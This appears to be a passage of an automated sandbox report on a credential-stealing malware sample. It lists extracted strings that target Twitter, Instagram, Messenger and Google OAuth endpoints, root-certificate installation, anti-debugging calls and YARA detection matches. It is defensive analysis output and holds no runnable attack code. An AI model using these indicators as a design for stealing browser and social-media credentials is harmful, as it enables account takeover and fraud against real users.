Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yG8H?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBMQmHU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBMVUFn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBS0Ogx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuaWG?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: 56BB1610C0318054.exeString found in binary or memory: https://payments.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsdVA0HSE
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://pki.goog/repository/0
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 56BB1610C0318054.exeString found in binary or memory: https://sandbox.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 56BB1610C0318054.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsJtW23HRG
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx7w
Source: 56BB1610C0318054.exe, 00000002.00000003.409306143.0000000004128000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000002.00000003.390531939.0000000003D75000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 56BB1610C0318054.exe, 00000002.00000003.390531939.0000000003D75000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashAM
Source: 56BB1610C0318054.exe, 00000002.00000003.390531939.0000000003D75000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ookie:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comReferer:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.371026243.0000000003813000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376084985.0000000003D38000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp, ecvFEAD.tmp.9.drString found in binary or memory: https://www.digicert.com/CPS0
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=1824632442.1601478955
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 56BB1610C0318054.exe, ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.373472200.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.google.com/cloudprint/enab
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373472200.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorSV4HR
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/calend
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly)
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messagingY
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyOnTP1HRE
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/h
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetingsn
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwritecon
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.373528673.0000000003D3E000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.emaila
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accept:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: C:\Users\user\AppData\Roaming\1611970637183.exe, Code function: 9_2_0040AE4D OpenClipboard,
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe, Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.3.56BB1610C0318054.exe.2e30000.0.unpack, type: UNPACKEDPE, Matched rule: APT34_PICKPOCKET Author: unknown
Source: 2.2.56BB1610C0318054.exe.32e0000.6.unpack, type: UNPACKEDPE, Matched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.56BB1610C0318054.exe.31a0000.6.unpack, type: UNPACKEDPE, Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: Cyfj6XGbkd.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 56BB1610C0318054.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe, Code function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe, Code function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe, Code function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe, Code function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Roaming\1611970637183.exe, Code function: 9_2_0040C516 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\1611970637183.exe, Code function: 9_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe, Code function: 0_2_00403660: DeviceIoControl,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe, Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe, Code function: String function: 10010534 appears 35 times
Source: 1611970637183.exe.2.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Cyfj6XGbkd.exe, 00000000.00000002.365545591.0000000000680000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamenlsbres.dllj% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.365550326.0000000000690000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000000.342542352.0000000000412000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.365576520.00000000007F0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: sfc.dll
Source: Cyfj6XGbkd.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
